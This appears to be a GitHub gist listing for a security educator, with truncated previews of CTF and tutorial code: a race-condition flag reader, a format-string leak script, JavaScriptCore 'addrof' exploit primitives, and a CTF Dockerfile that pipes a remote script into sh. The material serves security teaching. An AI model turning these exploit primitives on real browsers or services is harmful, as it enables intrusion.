Skip to content

Instantly share code, notes, and snippets.

View LiveOverflow's full-sized avatar
🔴
verified hacker

LiveOverflow

🔴
verified hacker
5.3k followers · 0 following
View GitHub Profile
@LiveOverflow
LiveOverflow / forwarder.py
Created February 17, 2023 15:19
TCP Forwarder
import socket
import select
from logzero import logger
# python forwarder.py localhost:1337 ipinfo.io:80
# curl -v http://localhost.com:1337 -H "Host: ipinfo.io"
# video: https://www.youtube.com/watch?v=32KKwgF67Ho
class Forwarder:
@LiveOverflow
LiveOverflow / hireme.ipynb
Created November 20, 2020 10:46
Hire me!!!!!!!!
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
@LiveOverflow
LiveOverflow / readflag.c
Created December 18, 2019 01:30
File Path Race Condition
#define _GNU_SOURCE
#include <stdio.h>
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <linux/fs.h>
// source https://github.com/sroettger/35c3ctf_chals/blob/master/logrotate/exploit/rename.c
int main(int argc, char *argv[]) {
@LiveOverflow
LiveOverflow / asd.py
Last active May 5, 2023 19:38
C Application Firewall
import struct
import socket
s = socket.socket()
s.connect(('127.0.0.1', 1337))
r = s.recv(1024)
s.send("%p,%p,%p\n")
while ',' not in r:
r = s.recv(1024)
start_buf = int(r.split(',')[1], 16)-9
@LiveOverflow
LiveOverflow / test.js
Last active October 17, 2023 16:42
Revisiting JavaScriptCore Internals: boxed vs. unboxed - browser 0x06
// based on: https://github.com/LinusHenze/WebKit-RegEx-Exploit
// tutorial: https://liveoverflow.com/tag/browser-exploitation/
// playlist: https://www.youtube.com/watch?v=5tEdSoZ3mmE&list=PLhixgUqwRTjwufDsT1ntgOY9yjZgg5H_t
// addrof primitive
function addrof(val) {
var array = [13.37];
var reg = /abc/y;
// Target function
@LiveOverflow
LiveOverflow / test.js
Created June 22, 2019 23:12
Browser Exploitation - bowser 0x05
// based on: https://github.com/LinusHenze/WebKit-RegEx-Exploit
// tutorial: https://liveoverflow.com/tag/browser-exploitation/
// playlist: https://www.youtube.com/watch?v=5tEdSoZ3mmE&list=PLhixgUqwRTjwufDsT1ntgOY9yjZgg5H_t
// addrof primitive
function addrof(val) {
var array = [13.37];
var reg = /abc/y;
// Target function
@LiveOverflow
LiveOverflow / test.js
Last active June 22, 2019 23:09
Browser Exploitation - bowser 0x04
// based on: https://github.com/LinusHenze/WebKit-RegEx-Exploit
// tutorial: https://liveoverflow.com/tag/browser-exploitation/
// playlist: https://www.youtube.com/watch?v=5tEdSoZ3mmE&list=PLhixgUqwRTjwufDsT1ntgOY9yjZgg5H_t
// addrof primitive
function addrof(val) {
var array = [13.37];
var reg = /abc/y;
// Target function
@LiveOverflow
LiveOverflow / Dockerfile
Created May 18, 2019 10:11
ubuntu:18.04 CTF Docker
FROM ubuntu:18.04
ENV LC_CTYPE C.UTF-8
RUN apt-get update && apt-get install -y strace ltrace curl wget gcc net-tools vim gdb python python3 python3-pip wget git make procps libpcre3-dev libdb-dev libxt-dev libxaw7-dev python-pip && (wget -q -O- https://github.com/hugsy/gef/raw/master/scripts/gef.sh | sh) && pip install capstone && mkdir tools && cd tools && git clone https://github.com/JonathanSalwan/ROPgadget && pip3 install keystone-engine && pip3 install unicorn && pip3 install capstone && pip3 install ropper && pip3 install keystone-engine && pip install requests && pip install pwn && git clone https://github.com/radare/radare2 && cd radare2 && sys/install.sh && pip install r2pipe && dpkg --add-architecture i386 && apt update && apt install -y libc6:i386 libncurses5:i386 libstdc++6:i386 && wget https://developer.arm.com/-/media/Files/downloads/gnu-rm/7-2018q2/gcc-arm-none-eabi-7-2018-q2-update-linux.tar.bz2?revision=bc2c96c0-14b5-4bb4-9f18-bceb4050fee7?product=GNU%20Arm%20Embedded%20Toolchain,64-bit,,Lin
@LiveOverflow
LiveOverflow / fuzz.html
Created April 7, 2019 10:35
Fuzz innerHTML vs. DOMParser
<html>
<body>
<script>
const tags = ["a", "abbr", "address", "area", "article", "aside", "audio", "b", "base", "bdi", "bdo", "blockquote", "body", "br", "button", "canvas", "caption", "cite", "code", "col", "colgroup", "data", "datalist", "dd", "del", "details", "dfn", "dialog", "div", "dl", "dt", "em", "embed", "fieldset", "figcaption", "figure", "footer", "form", "h1", "h2", "h3", "h4", "h5", "h6", "head", "header", "hgroup", "hr", "html", "i", "iframe", "img", "input", "ins", "kbd", "keygen", "label", "legend", "li", "link", "main", "map", "mark", "math", "menu", "menuitem", "meta", "meter", "nav", "noscript", "object", "ol", "optgroup", "option", "output", "p", "param", "picture", "pre", "progress", "q", "rb", "rp", "rt", "rtc", "ruby", "s", "samp", "script", "section", "select", "slot", "small", "source", "span", "strong", "style", "sub", "summary", "sup", "svg", "table", "tbody", "td", "template", "textarea", "tfoot", "th", "thead", "time", "title", "tr", "track", "u", "ul", "var", "video", "wbr"]
@LiveOverflow
LiveOverflow / AcoraidaMonicaGame.sol
Last active February 10, 2024 13:13
Acoraida Monica
pragma solidity =0.4.25;
contract AcoraidaMonicaGame{
uint256 public version = 4;
string public description = "Acoraida Monica admires smart guys, she'd like to pay 10000ETH to the one who could answer her question. Would it be you?";
string public constant sampleQuestion = "Who is Acoraida Monica?";
string public constant sampleAnswer = "$*!&#^[` a@.3;Ta&*T` R`<`~5Z`^5V You beat me! :D";
Logger public constant logger=Logger(0x5e351bd4247f0526359fb22078ba725a192872f3);
address questioner;
string public question;